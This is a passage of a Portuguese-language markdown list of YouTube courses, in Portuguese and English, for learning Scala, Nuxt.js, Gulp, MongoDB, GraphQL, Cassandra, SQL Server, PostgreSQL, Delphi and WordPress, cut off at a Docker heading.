- [Spark Scala | Spark Tutorial | Scala Tutorial | Spark Scala Full Course | Intellipaat](https://www.youtube.com/watch?v=PzQ3DBrHW-U&ab_channel=Intellipaat)
- [Scala Tutorial 1 - Introduction to Scala](https://www.youtube.com/watch?v=LQVDJtfpQU0&list=PLS1QulWo1RIagob5D6kMIAvu7DQC5VTh3&ab_channel=ProgrammingKnowledge)
- [Introduction to Scala Basics](https://www.youtube.com/watch?v=iilTz5R_i6E&list=PLWPirh4EWFpFeu4K1gdw2M-97w_5qEpeU&ab_channel=TutorialsPoint)
- [Scala Tutorial for Beginners](https://www.youtube.com/watch?v=OfngvXKNkpM&ab_channel=ProgrammingKnowledge)
- [Apache Spark Tutorial | Spark Tutorial For Beginners | Spark Scala Full Course | Intellipaat](https://www.youtube.com/watch?v=r83NhShrNdw&ab_channel=Intellipaat)
- [Scala Crash Course by a Scala Veteran (with some JavaScript flavor)](https://www.youtube.com/watch?v=-xRfJcwhy7A&ab_channel=DevInsideYou)
- [Why Scala? | An introduction by Adam Warski](https://www.youtube.com/watch?v=t7SOXNJVbJo&ab_channel=SoftwareMill)
- [Scala Tutorial 1 Why Scala ( हिन्दी)](https://www.youtube.com/watch?v=xw9N8CQo5JI&list=PLgPJX9sVy92wUdX7uVMgEzREgJrXiRdUC&ab_channel=CSGeeks)
- [Scala Tutorial Full Course](https://www.youtube.com/watch?v=i9o70PMqMGY&ab_channel=Telusko)
- [Scala Tutorial](https://www.youtube.com/watch?v=DzFt0YkZo8M&ab_channel=DerekBanas)
- [Scala 3 & Functional Programming Essentials Course: An Overview of Scala](https://www.youtube.com/watch?v=Rp2b7pgXxFY&ab_channel=RocktheJVM)
- [Functional Programming Crash Course for Scala Beginners](https://www.youtube.com/watch?v=XXkYBncbz0c&ab_channel=DevInsideYou)
- [Scala Programming Tutorial | Learn Scala programming | Scala language](https://www.youtube.com/watch?v=pDq06gwJnLk&ab_channel=ProgrammingKnowledge)
## 🦝 Sites e cursos para aprender Nuxt.js
> Cursos para aprender Nuxt.js em Português
> [Curso gratuito de Nuxt.js 2 #1 - Introdução e instalação](https://www.youtube.com/watch?v=jw6tRUGkpmo&ab_channel=TiagoMatos)[
> [Nuxtjs para iniciantes - Dando um boost no seu desenvolvimento Vue js](https://www.youtube.com/watch?v=mJLeZWl71cA&ab_channel=TiagoMatos)[
> [Nuxt.js (O Melhor Companheiro do Vue.js) // Dicionário do Programador](https://www.youtube.com/watch?v=l2y8oYqNV8I&ab_channel=C%C3%B3digoFonteTV)[
> [Nuxt Levue Week (NLW) #01 - Introdução e Configuração (Vue, Nuxt, TypeScript e TailwindCSS)](https://www.youtube.com/watch?v=VbkFOWw4yeY&ab_channel=Frontverso)[
> [Nuxt.JS: Conhecendo o Framework](https://www.youtube.com/watch?v=CZ6Qbn80h4k&ab_channel=PabloCodes)
> Cursos para aprender Nuxt.js em Inglês
- [Getting Started with Nuxt 3 | A Beginners Guide](https://www.youtube.com/watch?v=KHF4JdcF4JA&ab_channel=VueMastery)
- [What is Nuxt js? | One Dev Question](https://www.youtube.com/watch?v=og_2HLjgD0E&ab_channel=MicrosoftDeveloper)
- [Learn NuxtJS Tutorial for Beginners | Udemy Instructor, Maximilian Schwarzmüller](https://www.youtube.com/watch?v=PVMOQrdEjB0&ab_channel=Udemy)
- [Nuxt JS Crash Course](https://www.youtube.com/watch?v=Wdmi4k7sFzU&ab_channel=LaithAcademy)
- [Nuxt JS beginner tutorial - In Depth Intro to Nuxt.js | SPA, SSR, Static Site, Vue.js Family](https://www.youtube.com/watch?v=YjmLFdXiCJU&list=PLe30vg_FG4OQihO5an0tNT_dpkxig8iPz&ab_channel=Bitfumes)
- [Nuxt 3 Crash Course #1 - What is Nuxt?](https://www.youtube.com/watch?v=GBdO5myZNsQ&ab_channel=TheNetNinja)
- [Nuxt 3 full course build and deploy | #Nuxtjs #vue #nuxt3](https://www.youtube.com/watch?v=5dQMQ1BwUyc&ab_channel=Bitfumes)
- [Next.js Tutorial - 1 - Introduction](https://www.youtube.com/watch?v=9P8mASSREYM&list=PLC3y8-rFHvwgC9mj0qv972IO5DmD-H0ZH&ab_channel=Codevolution)
- [Mastering Nuxt JS Course](https://www.youtube.com/watch?v=sS9pkLlZ96E&ab_channel=AcademiaDigital)
- [The Nuxt 3 Crash Course](https://www.youtube.com/watch?v=dZC4T4UiU1c&ab_channel=LaithAcademy)
- [Nuxt JS For Beginners! - What is Nuxt and how to use it!?](https://www.youtube.com/watch?v=CBwq_TUL5Fg&ab_channel=TylerPotts)
- [Next.js 13 Crash Course | Learn How To Build Full Stack Apps!](https://www.youtube.com/watch?v=T63nY70eZF0&ab_channel=developedbyed)
- [Build & Deploy a Movie App With NuxtJS | NuxtJS Crash Course (2021)](https://www.youtube.com/watch?v=IzLIXyZkKAA&ab_channel=JohnKomarnicki)
## 🦎 Sites e cursos para aprender Gulp
> Cursos para aprender Gulp em Português
- [Gulp - Dicionário do Programador](https://www.youtube.com/watch?v=H_jbU5ClRgc&ab_channel=C%C3%B3digoFonteTV)
- [Curso de GulpJS - Módulo I - Plugin Gulp Sass](https://www.youtube.com/watch?v=TEoqa9VSoXA&ab_channel=ProfessorChoren)
- [Como Usar o Gulp JS - Tutorial de gulp completo](https://www.youtube.com/watch?v=QobWkb20UEQ&ab_channel=FeatureCode)
- [Aula 01 - Curso de Gulp - Introdução](https://www.youtube.com/watch?v=9pZOL5_bTw4&list=PLWhiA_CuQkbD8BiFB0aGkwpqpGjvNM3zC&ab_channel=FilipeMorelliDeveloper)
- [Curso de GulpJS - O que é o Gulp? Por que eu deveria utilizá-lo?](https://www.youtube.com/watch?v=LDLPBuGYoqo&ab_channel=ProfessorChoren)
- [Aula 01 - Curso de Gulp - Introdução](https://www.youtube.com/watch?v=9pZOL5_bTw4&ab_channel=FilipeMorelliDeveloper)
- [Usando Gulp em Arquivos Javascript // Mão no Código #2](https://www.youtube.com/watch?v=jsF1PeCxXqM&ab_channel=C%C3%B3digoFonteTV)
- [Trabalhando com GULP | Torne-se um Programador](https://www.youtube.com/watch?v=2kdR2D8EEho&ab_channel=DaniloAparecido-Torne-seumprogramador)
- [Grunt vs. Gulp #1 - Qual é o melhor? - Rodrigo Branas](https://www.youtube.com/watch?v=ZG0fSXOKcGM&ab_channel=RodrigoBranas)
> Cursos para aprender Gulp em Inglês
- [Browsersync + Sass + Gulp in 15 minutes](https://www.youtube.com/watch?v=q0E1hbcj-NI&ab_channel=CoderCoder)
- [Gulp JS Crash Course](https://www.youtube.com/watch?v=1rw9MfIleEg&ab_channel=TraversyMedia)
- [Curso de GulpJS - Módulo I - Plugin Gulp Sass](https://www.youtube.com/watch?v=TEoqa9VSoXA&ab_channel=ProfessorChoren)
- [Gulp 4 Crash Course for Beginners](https://www.youtube.com/watch?v=-lG0kDeuSJk&ab_channel=CoderCoder)
- [Gulp.js Crash Course](https://www.youtube.com/watch?v=JDXmbcNYdoU&ab_channel=BalboaCodes)
- [Gulp from scratch: Intro - What the hell is Gulp?](https://www.youtube.com/watch?v=oRoy1fJbMls&list=PLriKzYyLb28lp0z-OMB5EYh0OHaKe91RV&ab_channel=AlessandroCastellani)
- [Gulp from scratch: Intro - What the hell is Gulp?](https://www.youtube.com/watch?v=oRoy1fJbMls&ab_channel=AlessandroCastellani)
- [Full beginner Gulp setup for SCSS, minifying Javascript, and minifying/webp images](https://www.youtube.com/watch?v=ubHwScDfRQA&ab_channel=CodinginPublic)
- [Gulp JS Crash Course in Hindi #1 - An Introduction to Gulp](https://www.youtube.com/watch?v=awz6G57aY_c&ab_channel=PortableProgrammer)
- [Gulpfile Setup-Automate and Enhance Your Code](https://www.youtube.com/watch?v=CFdzwGb5pBg&ab_channel=Treehouse)
- [Gulp.js Tutorial - Getting Started With Gulp js | Sass](https://www.youtube.com/watch?v=8H8E75bkXos&ab_channel=CurlyBraces)
- [Essential Gulp Tasks: Introduction](https://www.youtube.com/watch?v=3-WNVccDpKo&ab_channel=EnvatoTuts%2B)
- [Gulp v4 - Sass and BrowserSync setup](https://www.youtube.com/watch?v=QgMQeLymAdU&ab_channel=KevinPowell)
## 🐅 Sites e cursos para aprender MongoDB
> Cursos para aprender MongoDB em Português
- [Curso de MongoDB fundamental | Aprenda MongoDB em 1 hora - 2021](https://www.youtube.com/watch?v=x9tC0eK0GtA&ab_channel=MatheusBattisti-HoradeCodar)
- [MongoDB em 15 minutos](https://www.youtube.com/watch?v=j-cjF1GkEMQ&t=475s&ab_channel=CanalTI)
- [CRIE UMA API COM NODE.JS EXPRESS MONGODB E MONGOOSE - API RESTFUL](https://www.youtube.com/watch?v=anMK76I2dUA&ab_channel=MatheusBattisti-HoradeCodar)
- [MongoDB (O Banco de Dados NoSQL mais Legal) - Dicionário do Programador](https://www.youtube.com/watch?v=4dTI1mVLX3I&ab_channel=C%C3%B3digoFonteTV)
- [Curso de MongoDB para iniciantes](https://www.youtube.com/watch?v=u3sVM3viDtQ&list=PLxuFqIk29JL0DMM0Z-S9_XEHAexXvhYyb&ab_channel=NatanielPaivaOficial)
- [O que é Node.js? - Curso - Aula Grátis #01](https://www.youtube.com/watch?v=irrkH6VII78&list=PLsGmTzb4NxK0_CENI1ThoFUNeyIgsZ32V&ab_channel=LuizTools)
- [Mongodb - Introdução](https://www.youtube.com/watch?v=3z90A7VBF4Y&list=PL4Sl6eAbMK7RsS4Q8tSHTlOIaUmTG9eRS&ab_channel=Zurubabel)
- [Introdução NoSQL e MongoDB](https://www.youtube.com/watch?v=kedLyo95fGU&list=PLyqlZW5s3wkoMhARQKp3s4YtaeKucb0Xj&ab_channel=RicardoLeme)
> Cursos para aprender MongoDB em Inglês
- [MongoDB Crash Course](https://www.youtube.com/watch?v=ofme2o29ngU&ab_channel=WebDevSimplified)
- [MongoDB Tutorial For Beginners | Full Course](https://www.youtube.com/watch?v=Www6cTUymCY&ab_channel=Amigoscode)
- [Complete MongoDB Tutorial #1 - What is MongoDB?](https://www.youtube.com/watch?v=ExcRbA7fy_A&list=PL4cUxeGkcC9h77dJ-QJlwGlZlTd4ecZOA&ab_channel=TheNetNinja)
- [MongoDB course 2022 | MongoDB tutorial](https://www.youtube.com/watch?v=9cWm74DteMQ&ab_channel=Bitfumes)
- [MongoDB Tutorial | MongoDB Full Course | MongoDB | MongoDB Tutorial For Beginners | Simplilearn](https://www.youtube.com/watch?v=lBBtq3Oawqw&ab_channel=Simplilearn)
- [Course Structure and Projects](https://www.youtube.com/watch?v=VI9TP-_7X1E&list=PLx6gGOAOEqGHqDaIjFhwnojD4Lhf4kU_N&ab_channel=ITServices%26Consulting)
- [How to install MongoDB 6.0.3 on Windows 11 | Install MongoDB 6.0.3 & Mongo Shell | MongoDB Tutorial](https://www.youtube.com/watch?v=1y5sAnn0ans&list=PLSDyGb_vtanyZbsI9coZHdBNoD1ZVJn7E&ab_channel=CSCORNERSunitaRai)
- [Diagnostic Thinking Course - MongoDB University](https://www.youtube.com/watch?v=9D900FFuivw&list=PL4RCxklHWZ9tDjU4TEEGof955v8JS0oet&ab_channel=MongoDB)
- [Introduction to MongoDB | Fundamentals of MongoDB | Complete MongoDB Course 2022](https://www.youtube.com/watch?v=l7Psw5frLwk&list=PL1BztTYDF-QM6KSVfrbSyJNTU9inyBqYF&ab_channel=procademy)
- [Complete MongoDB Tutorial #25 - MongoDB Atlas](https://www.youtube.com/watch?v=084rmLU1UgA&ab_channel=TheNetNinja)
- [MongoDB Tutorial For Beginners #1 - Introduction](https://www.youtube.com/watch?v=Ya0H-7A5cE4&list=PLp50dWW_m40UWFSV6PTgYzciZJIxgHy7Q&ab_channel=ARCTutorials)
- [MongoDB In 30 Minutes](https://www.youtube.com/watch?v=pWbMrx5rVBE&ab_channel=TraversyMedia)
- [MongoDB Crash Course 2022](https://www.youtube.com/watch?v=2QQGWYe7IDU&ab_channel=TraversyMedia)
- [MongoDB in 100 Seconds](https://www.youtube.com/watch?v=-bt_y4Loofg&ab_channel=Fireship)
- [Complete MongoDB Tutorial #1 - What is MongoDB?](https://www.youtube.com/watch?v=ExcRbA7fy_A&ab_channel=TheNetNinja)
## 🦩 Sites e cursos para aprender GraphQL
> Cursos para aprender GraphQL em Português
- [Fundamentos do GraphQL na prática (Node.js + React) | Decode 019](https://www.youtube.com/watch?v=6SZOPKs9SUg&t=2851s&ab_channel=Rocketseat)
- [GraphQL no Node.js do ZERO criando 2 apps completos](https://www.youtube.com/watch?v=1dz48pReq_c&ab_channel=Rocketseat)
- [Curso COMPLETO de GraphQL #1: Introdução | O Que é ? | O Que veio resolver?](https://www.youtube.com/watch?v=RyqLvFhPNy8&list=PLK5FPzMuRKlyeZYiJNA54j4lpfxHGlz0j&ab_channel=WashingtonDeveloper)
- [GraphQL // Dicionário do Programador](https://www.youtube.com/watch?v=xbLpIhCsIdg&ab_channel=C%C3%B3digoFonteTV)
- [Modern GraphQL Crash Course - 2022](https://www.youtube.com/watch?v=qux4-yWeZvo&ab_channel=LaithAcademy)
- [O que é GraphQL? com Juliana Amoasei | #HipstersPontoTube](https://www.youtube.com/watch?v=trf3ZR_K1nk&ab_channel=AluraCursosOnline)
- [Entendendo GraphQL](https://www.youtube.com/watch?v=x6TwzA2yh08&ab_channel=DevPleno)
- [GraphQL: O mínimo que um Full Cycle Developer precisa saber. feat: Rodrigo Branas](https://www.youtube.com/watch?v=NJsSsLmQPN4&ab_channel=FullCycle)
- [Apresentação do Projeto - Aprenda NextJS, GraphQL na prática!](https://www.youtube.com/watch?v=WOqF_pSzyvQ&list=PLlAbYrWSYTiPlXj6USip_lCPzONUATJbE&ab_channel=WillianJusten)
> Cursos para aprender GraphQL em Inglês
- [Modern GraphQL Crash Course - 2022](https://www.youtube.com/watch?v=qux4-yWeZvo&ab_channel=LaithAcademy)
- [GraphQL Explained in 100 Seconds](https://www.youtube.com/watch?v=eIQh02xuVw4&t=9s&ab_channel=Fireship)
- [What Is GraphQL? | GraphQL Course For Beginners Ep. 1](https://www.youtube.com/watch?v=16bHGKe1QqY&list=PLpPqplz6dKxXICtNgHY1tiCPau_AwWAJU&ab_channel=PedroTech)
- [GraphQL Full Course - Novice to Expert](https://www.youtube.com/watch?v=ed8SzALpx1Q&ab_channel=freeCodeCamp.org)
- [GraphQL Tutorial #1 - Introduction to GraphQL](https://www.youtube.com/watch?v=Y0lDGjwRYKw&list=PL4cUxeGkcC9iK6Qhn-QLcXCXPQUov1U7f&ab_channel=TheNetNinja)
- [Spring Tips: Spring for GraphQL: the GraphQL Java Engine](https://www.youtube.com/watch?v=gvIqFDNGgwU&list=PLgGXSWYM2FpNRPDQnAGfAHxMl3zUG2Run&ab_channel=SpringDeveloper)
- [What is GraphQL?](https://www.youtube.com/watch?v=wfBeEn8d-8A&list=PL3eAkoh7fypqxiqDq9OQGm3aJO7dZjSBI&ab_channel=PragmaticReviews)
- [GraphQL Mesh as a Gateway](https://www.youtube.com/watch?v=fhTg5wPU5LY&list=PLs2PzMqLzi7UPExN1rjpaDlXMVZQTxeDm&ab_channel=JamieBarton)
- [GraphQL Crash Course With Full Stack MERN Project](https://www.youtube.com/watch?v=BcLNfwF04Kw&ab_channel=TraversyMedia)
- [Learn GraphQL In 40 Minutes](https://www.youtube.com/watch?v=ZQL7tL2S0oQ&ab_channel=WebDevSimplified)
- [Learn GraphQL in 4 Hours - From Beginner to Expert](https://www.youtube.com/watch?v=yqWzCV0kU_c&ab_channel=PedroTech)
- [GraphQL & Apollo server full course](https://www.youtube.com/watch?v=VaN6_yDTcNs&ab_channel=Bitfumes)
- [GraphQL Crash course | easy way](https://www.youtube.com/watch?v=_Zss2Mbz4Bs&ab_channel=HiteshChoudhary)
- [Spring Boot GraphQL Tutorial #1 - Introduction, Dependencies, IDE Setup](https://www.youtube.com/watch?v=nju6jFW8CVw&list=PLiwhu8iLxKwL1TU0RMM6z7TtkyW-3-5Wi&ab_channel=PhilipStarritt)
- [The BEST GraphQL Course on Planet! | GraphQL for Beginners](https://www.youtube.com/watch?v=YJMSlR9z5Zw&ab_channel=codedamn)
- [GraphQL Crash Course](https://www.youtube.com/watch?v=CFrKTrMJIBY&ab_channel=LaithAcademy)
- [React With GraphQL (Apollo Client) Crash Course](https://www.youtube.com/watch?v=gAbIQx26wSI&ab_channel=LaithAcademy)
## 🦙 Sites e cursos para aprender Cassandra
> Cursos para aprender Cassandra em Português
- [Modelagem de dados com Cassandra - Cassandra Day Brasil 2022](https://www.youtube.com/watch?v=4vnqakN5HEw&ab_channel=DataStaxDevelopers)
- [Apache Cassandra Training | Apache Cassandra Tutorial | Apache Cassandra Course | Intellipaat](https://www.youtube.com/watch?v=47Us3i_XetI&ab_channel=Intellipaat)
- [Curso de Apache Cassandra](https://www.youtube.com/watch?v=Vr6CokWVCkQ&ab_channel=OpenWebinars)
- [Tudo sobre Apache Cassandra](https://www.youtube.com/watch?v=FbluLZmHmPI&ab_channel=KeepCoding-TechSchool)
- [Instalando e trabalhando com banco de dados Cassandra](https://www.youtube.com/watch?v=ngY3QRJPVwU&ab_channel=EduardodeBastianiMior)
- [Apache Cassandra - Armazenando Grandes Bases de Dados](https://www.youtube.com/watch?v=1oz4ZmBRmzk&ab_channel=InstitutoInfnet)
> Cursos para aprender Cassandra em Inglês
- [Apache Cassandra - Tutorial 1 - Introduction to Apache Cassandra](https://www.youtube.com/watch?v=s1xc1HVsRk0&list=PLalrWAGybpB-L1PGA-NfFu2uiWHEsdscD&ab_channel=jumpstartCS)
- [Apache Cassandra Training | Apache Cassandra Tutorial | Apache Cassandra Course | Intellipaat](https://www.youtube.com/watch?v=47Us3i_XetI&ab_channel=Intellipaat)
- [Apache Cassandra Database – Full Course for Beginners](https://www.youtube.com/watch?v=J-cSy5MeMOA&ab_channel=freeCodeCamp.org)
- [Intro to Cassandra - Cassandra Fundamentals](https://www.youtube.com/watch?v=YjYWsN1vek8&list=PL2g2h-wyI4SqCdxdiyi8enEyWvACcUa9R&ab_channel=DataStaxDevelopers)
- [Introduction to Cassandra | Cassandra Tutorial | Cassandra Online Training - Intellipaat](https://www.youtube.com/watch?v=Q7jO0UaH1iU&list=PLVHgQku8Z93762uoAOdAeVfr6gwPUViAt&ab_channel=Intellipaat)
- [What is Apache Cassandra? | Apache Cassandra Tutorial | Apache Cassandra Introduction | Edureka](https://www.youtube.com/watch?v=iDhIjrJ7hG0&list=PL9ooVrP1hQOGJ4Yz9vbytkRmLaD6weg8k&ab_channel=edureka%21)
- [Introduction To Apache Cassandra Certification Training | Simplilearn](https://www.youtube.com/watch?v=JlZxTmmRdDk&ab_channel=Simplilearn)
- [Cassandra Database Crash Course](https://www.youtube.com/watch?v=KZsVSfQVU4I&ab_channel=CodewithIrtiza)
## 🦛 Sites e cursos para aprender SQL Server
> Cursos para aprender SQL Server em Português
- [SQL SERVER - 01 - SQL Server Express Edition - Instalando no seu computador](https://www.youtube.com/watch?v=OKqpZ6zbZwQ&list=PL7iAT8C5wumpQWB8AFW7CwK2nlzh8ZdP9&ab_channel=AlessandroTrovato)
- [Curso SQL Completo 2022 [Iniciantes] + Desafios + Muita Prática](https://www.youtube.com/watch?v=G7bMwefn8RQ&ab_channel=DevAprender)
- [Curso de SQL Server para Iniciantes (Aula 0) - Expectativas e Link para Baixar o SQL Server](https://www.youtube.com/watch?v=X7BUKUoO8ZI&list=PL4OAe-tL47sY7ZzeE8__q_N7BWFOehxug&ab_channel=Zurubabel)
> Cursos para aprender SQL Server em Inglês
- [SQL Tutorial - Full Database Course for Beginners](https://www.youtube.com/watch?v=HXV3zeQKqGY&t=32s&ab_channel=freeCodeCamp.org)
- [SQL Server Tutorial For Beginners | Microsoft SQL Server Tutorial | SQL Server Training | Edureka](https://www.youtube.com/watch?v=-EPMOaV7h_Q&ab_channel=edureka%21)
- [Install SQL Server 2019 Step by Step | Developer Edition | Free Software | Install SSMS](https://www.youtube.com/watch?v=7GVFYt6_ZFM&list=PL08903FB7ACA1C2FB&ab_channel=kudvenkat)
- [Sql Server tutorial || onlinetraining||Sql Server ||Introduction Part - 1 by Narayana](https://www.youtube.com/watch?v=wt3yuc-rTJA&list=PLd3UqWTnYXOkDmQvCVKsXeoGeocusMP4i&ab_channel=DurgaSoftwareSolutions)
- [Advanced Sql Tutorial (001 Welcome to the course)](https://www.youtube.com/watch?v=Fm3fMnbWTGg&list=PLw_k9CF7hBpIFmHUyz2jQ3Fo7yYW9jeol&ab_channel=FreeOnlineCourses)
- [Learn SQL Complete | Course Introduction | SQL Full Course | SQL Tutorial For Beginners (0/11)](https://www.youtube.com/watch?v=5FrBJ4PXj2s&list=PLjNd3r1KLjQtFEklcPDhidqC_2lmpjk5H&ab_channel=AnalyticswithNags)
- [Introduction of SQL Server | SQL Server Tutorial](https://www.youtube.com/watch?v=eSUG8zZ7DfQ&list=PLVlQHNRLflP8WFEvFvANnUsD2y8HJIJh1&ab_channel=NareshiTechnologies)
- [SQL Course | SQL Tutorial For Beginners | Learn SQL | Intellipaat](https://www.youtube.com/watch?v=wkOD6mbXc2M&ab_channel=Intellipaat)
## 🐐 Sites e cursos para aprender Postgree SQL
> Cursos para aprender Postgree SQL em Português
- [Introdução ao PostgreSQL - Curso de Postgres](https://www.youtube.com/watch?v=Z_SPrzlT4Fc&list=PLucm8g_ezqNoAkYKXN_zWupyH6hQCAwxY&ab_channel=B%C3%B3sonTreinamentos)
- [Guia Completo PostgreSQL do Básico ao Avançado | Como importar Banco de Dados Educacional NorthWind?](https://www.youtube.com/watch?v=Wmg_JfwkODU&list=PLDqAb8tE7SQZzMWvPG4PYevQAW1cDsbD0&ab_channel=ProfessorMarcoMaddo)
- [Instalando o PostgreSQL e Criando o Primeiro Banco de Dados](https://www.youtube.com/watch?v=L_2l8XTCPAE&ab_channel=HashtagPrograma%C3%A7%C3%A3o)
- [Banco de Dados com PostgreSQL - #01 - Introdução](https://www.youtube.com/watch?v=k4wYRoMvBwE&list=PLWd_VnthxxLe660ABLFZH26CW3G-uQIv-&ab_channel=Descompila)
- [Curso PostgreSQL #1 Instalando no Ubuntu e Derivados](https://www.youtube.com/watch?v=grJlOnbZYus&list=PLiLrXujC4CW0YEyTxomRYXiyQEzJB4P0l&ab_channel=DanielMoraisInfocotidiano)
- [Primeiros Passos no PostgreSQL](https://www.youtube.com/watch?v=l5VXbLNYu2U&ab_channel=HashtagPrograma%C3%A7%C3%A3o)
> Cursos para aprender Postgree SQL em Inglês
- [Learn PostgreSQL Tutorial - Full Course for Beginners](https://www.youtube.com/watch?v=qw--VYLpxG4&ab_channel=freeCodeCamp.org)
- [PostgreSQL: What is a Database | Course | 2019](https://www.youtube.com/watch?v=XQ_6G0iCyMQ&list=PLwvrYc43l1MxAEOI_KwGe8l42uJxMoKeS&ab_channel=Amigoscode)
- [PostgreSQL Tutorial Full Course 2022](https://www.youtube.com/watch?v=85pG_pDkITY&ab_channel=DerekBanas)
- [PostgreSQL CRASH COURSE - Learn PostgreSQL in 2022](https://www.youtube.com/watch?v=zw4s3Ey8ayo&ab_channel=TroyAmelotte)
- [SQL For Beginners Tutorial | Learn SQL in 4.2 Hours | 2021](https://www.youtube.com/watch?v=5hzZtqCNQKk&ab_channel=Amigoscode)
- [Learn Database Administration - PostgreSQL Database Administration (DBA) for Beginners](https://www.youtube.com/watch?v=aUfPf-clLLs&ab_channel=DatabasesA2Z)
- [PostgreSQL: What is PostreSQL AKA Postrgres | Course | 2019](https://www.youtube.com/watch?v=tzbA7VniRpw&ab_channel=Amigoscode)
## 🐑 Sites e cursos para aprender Delphi
> Cursos para aprender Delphi em Português
- [O que é o Delphi?](https://www.youtube.com/watch?v=pFni9cj4tqE&list=PLVetaKmuPN9_gBPcyRZ7YinNXsNPSfrwY&ab_channel=AugustoC%C3%A9sar)
- [Delphi EM 10 MINUTOS: Tudo Que Você Precisa Saber para Começar!](https://www.youtube.com/watch?v=aTPgBJj6IRc&ab_channel=DevMedia)
- [Curso de Delphi 10 Avançado - Aula 01 - Programando com Delphi](https://www.youtube.com/watch?v=6CjoKSzeHHM&list=PLxNM4ef1BpxhAExrORrdjAUhm9krPxc-R&ab_channel=PortalHugoCursos)
- [Modelagem do Banco de Dados Inicial - Sistema de Escola Completo - Curso Delphi Gratuito](https://www.youtube.com/watch?v=2bdUJHGtwm4&list=PLVetaKmuPN99zOK1rgvKQV-gKhg96Mo5o&ab_channel=AugustoC%C3%A9sar)
- [Curso de Delphi 10 (2017) - Aula 01 - Iniciando na programação](https://www.youtube.com/watch?v=rBJ43Usj0NM&list=PLxNM4ef1BpxjAZNWTpzSGmZ86XDAa_jf4&ab_channel=PortalHugoCursos)
- [Delphi do Zero to Hero - #01](https://www.youtube.com/watch?v=zChvMKjmUeY&ab_channel=AcademiadoC%C3%B3digo)
- [Delphi (soluções para Desktop, Web e Mobile) // Dicionário do Programador](https://www.youtube.com/watch?v=QKjFEMDGCYk&ab_channel=C%C3%B3digoFonteTV)
> Cursos para aprender Delphi em Inglês
- [Learn Delphi Programming | Unit 1.1 | Welcome To Delphi Programming for Beginners](https://www.youtube.com/watch?v=wsGpj-FVjGs&list=PLZZqoiUyRBsRTgdPJPr-eqAiOnKlP3CaP&ab_channel=LearnDelphi)
- [Delphi Programming Course (FMX): 1 - Introduction to this course](https://www.youtube.com/watch?v=NrswPm4OCTk&list=PLfrySFqYRf2f8Tzyd8znGe1ldk72vJZ73&ab_channel=ShaunRoselt)
- [Delphi Programming - Full Beginner Crash Course](https://www.youtube.com/watch?v=BqmJpFbRY2U&ab_channel=Steve%27steacher)
- [Introduction to Delphi Programming](https://www.youtube.com/watch?v=NrWoheh_REU&ab_channel=CodeWithHuw)
## 🐊 Sites e cursos para aprender Wordpress
> Cursos para aprender Wordpress em Português
- [Curso WordPress Profissional](https://www.youtube.com/watch?v=JPR4OK4c35Q&list=PLHz_AreHm4dmDP_RWdiKekjTEmCuq_MW2&ab_channel=CursoemV%C3%ADdeo)
- [Curso de WordPress 2023: Elementor Container Flexbox](https://www.youtube.com/watch?v=pZOU9RPpr20&list=PLltHgIJnfTsAnyA8KPXC6ohTYzGEreVEa&ab_channel=CursoB-CursosOnline)
- [Curso WordPress na Prática | Passo a passo [2022]](https://www.youtube.com/watch?v=lBarY0wXf4Y&list=PLSAqMrdVsnTabS-6FQPcr3LcF-UzEA7Co&ab_channel=HostGatorAcademy)
- [Curso WordPress Grátis 2023: Como Criar um Site](https://www.youtube.com/watch?v=PBtM37Wug3E&list=PLR9X8pL__UdiA1wMB02jndrD1d2kffu1o&ab_channel=CursoWordPressDefinitivo)
- [Curso WordPress Grátis 2023 Completo - (Aula 1 - Apresentação)](https://www.youtube.com/watch?v=9LIZkP9HqJk&list=PLpEvhvupz-uQ3Fsaf_y1z_hRDKuh24dxR&ab_channel=iConectado-CursosOnline)
- [Como Criar Um Site No Wordpress | 2022 | Para Iniciantes](https://www.youtube.com/watch?v=YtFxzjCDoXk&t=2744s&ab_channel=SalaNinja)
- [Como Criar Site PROFISSIONAL, Instalar o WordPress Passo a Passo Completo, Fácil Sem Programação](https://www.youtube.com/watch?v=X6qHe5Eazyw&ab_channel=WesleyPereira-EmpreendedorDigital)
- [Curso de Wordpress COMPLETO paso a paso (Gutenberg)](https://www.youtube.com/watch?v=lwNEskjrGD8&ab_channel=RomualdFons)
- [WordPress para Iniciantes 2023 - Passo a Passo de Todas Funções do WordPress](https://www.youtube.com/watch?v=1EqAYuvOeT0&ab_channel=HostingerBrasil)
> Cursos para aprender Wordpress em Inglês
- [WordPress Full Course | Part 1](https://www.youtube.com/watch?v=-t5WNFPoCCE&list=PLQOGKy2nPhxlEVP4RBVrBoXPL6mZNZv5L&ab_channel=AzharulRafy)
- [How To Make A WordPress Website ~ 2023 ~ The Ultimate WordPress Tutorial For Beginners](https://www.youtube.com/watch?v=pf8wji-tjPw&ab_channel=WebYoda)
- [8 Hours Complete Course WordPress Tutorial for Beginners 2023](https://www.youtube.com/watch?v=09gj5gM4V98&ab_channel=Skilllot)
- [WordPress for Beginners | FREE COURSE](https://www.youtube.com/watch?v=MsRhxl_zk5A&ab_channel=EnvatoTuts%2B)
- [Education LMS WordPress Theme for Online Courses — MasterStudy | Ver. 4.0](https://www.youtube.com/watch?v=V8Lttze18-I&list=PL3Pyh_1kFGGDikfKuVbGb_dqKmXZY86Ve&ab_channel=StylemixThemes)
- [Cloudways Tutorial (Move to Cloudways in 19 Minutes!) Setup, Migration, Domain, SSL & Free SMTP](https://www.youtube.com/watch?v=N7C9RR28Ggg&list=PLSk3zfDlC1f-r0dWcZHsWccaJ3CUhhylZ&ab_channel=IdeaSpot)
- [WordPress Full Course in ONE VIDEO | ZERO to HERO | STEP BY STEP](https://www.youtube.com/watch?v=DcbPVzq8lHY&ab_channel=AzharulRafy)
- [What is WordPress & CMS (Content Management System) | WordPress Tutorial #1](https://www.youtube.com/watch?v=-6q3Rt1MTtk&list=PLjVLYmrlmjGcXDYZC67Us13PBD-3us9jB&ab_channel=WsCubeTech)
- [Week 01 | Lec 01 | Mentor Muhammad Kashif | WordPress full course | Digiskills](https://www.youtube.com/watch?v=7h_ETVuiSdY&list=PLuqUq6yfXlCGVBWbU_WyMQiLD72buRUvF&ab_channel=MissSkillie)
- [Build a Website from Start to Finish using WordPress [Full Course]](https://www.youtube.com/watch?v=IPo71JPKUmg&ab_channel=freeCodeCamp.org)
- [Become a WordPress Developer: Unlocking Power with Code](https://www.youtube.com/watch?v=FVqzKAUsM68&ab_channel=LearnWebCode)
- [How To Build A Website with Wordpress in 2023 (Full Tutorial)](https://www.youtube.com/watch?v=AABmCvjd_iU&ab_channel=CharlieChang)
## 🐳 Sites e cursos para aprender Docker
> Cursos para aprender Docker em Português
